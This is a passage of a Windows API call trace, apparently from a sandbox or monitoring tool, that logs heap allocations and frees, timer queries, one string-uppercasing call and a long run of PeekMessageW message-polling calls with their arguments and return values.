HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4478 | out: hHeap=0x770000) returned 1 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af278 | out: hHeap=0x770000) returned 1 [0026.310] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889208 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae788 | out: hHeap=0x770000) returned 1 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af248 | out: hHeap=0x770000) returned 1 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8892e0 | out: hHeap=0x770000) returned 1 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889310 | out: hHeap=0x770000) returned 1 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8892b0 | out: hHeap=0x770000) returned 1 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889268 | out: hHeap=0x770000) returned 1 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8892c8 | out: hHeap=0x770000) returned 1 [0026.310] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0a68 | out: hHeap=0x770000) returned 1 [0026.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af228 | out: hHeap=0x770000) returned 1 [0026.311] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af228 [0026.311] QueryPerformanceCounter (in: lpPerformanceCount=0x6af348 | out: lpPerformanceCount=0x6af348*=16823309986) returned 1 [0026.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af228 | out: hHeap=0x770000) returned 1 [0026.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0a68 [0026.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8892c8 [0026.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af228 [0026.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889268 [0026.311] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af248 [0026.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af248 | out: hHeap=0x770000) returned 1 [0026.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7ed1e8 [0026.311] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af248 [0026.311] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ae0 [0026.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af278 | out: hHeap=0x770000) returned 1 [0026.311] QueryPerformanceCounter (in: lpPerformanceCount=0x6af340 | out: lpPerformanceCount=0x6af340*=16823357478) returned 1 [0026.311] QueryPerformanceFrequency (in: lpFrequency=0x6af324 | out: lpFrequency=0x6af324*=100000000) returned 1 [0026.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8892b0 | out: hHeap=0x770000) returned 1 [0026.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ae0 | out: hHeap=0x770000) returned 1 [0026.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af248 | out: hHeap=0x770000) returned 1 [0026.311] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.311] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0026.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0b30 | out: hHeap=0x770000) returned 1 [0026.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af288 | out: hHeap=0x770000) returned 1 [0026.311] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af298 | out: hHeap=0x770000) returned 1 [0026.311] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8893e8 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2c8 | out: hHeap=0x770000) returned 1 [0026.312] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.312] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2f8 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af308 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af308 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af318 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2f8 | out: hHeap=0x770000) returned 1 [0026.312] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af318 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af318 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af318 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af318 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af308 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894d8 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894f0 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2f8 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891c0 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af328 | out: hHeap=0x770000) returned 1 [0026.312] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af328 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889478 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af328 | out: hHeap=0x770000) returned 1 [0026.312] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0026.312] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0026.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0026.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af318 | out: hHeap=0x770000) returned 1 [0026.313] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889478 | out: hHeap=0x770000) returned 1 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.313] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.314] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.315] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.315] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.315] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.315] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.315] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.315] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.315] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.315] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.315] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.315] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.315] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.315] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.315] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.315] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af29c) returned 0 [0026.324] PeekMessageW (in: lpMsg=0x6af29c, hWnd=0x0, 